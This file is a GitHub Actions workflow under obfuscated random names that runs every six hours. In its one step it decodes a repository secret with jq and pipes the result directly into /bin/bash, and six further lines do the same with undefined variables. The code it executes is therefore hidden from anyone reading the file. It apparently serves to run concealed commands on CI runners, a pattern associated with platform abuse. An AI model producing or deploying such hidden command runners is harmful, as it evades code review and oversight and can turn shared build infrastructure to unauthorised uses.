name: kongshequ4562
on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kongshequ4562
        env:
          atf6539: ${{ secrets.atf6539 }}
        run: |
          echo $atf6539 | jq -r .nd8 | /bin/bash
          echo $zmy8 | jq -r .ssy20303 | /bin/bash
          echo $v6 | jq -r .gbh2 | /bin/bash
          echo $dq515 | jq -r .zn54 | /bin/bash
          echo $ity4394 | jq -r .xq28 | /bin/bash
          echo $igxzn22 | jq -r .liinp540 | /bin/bash
          echo $oxcgi3360 | jq -r .mtv90 | /bin/bash

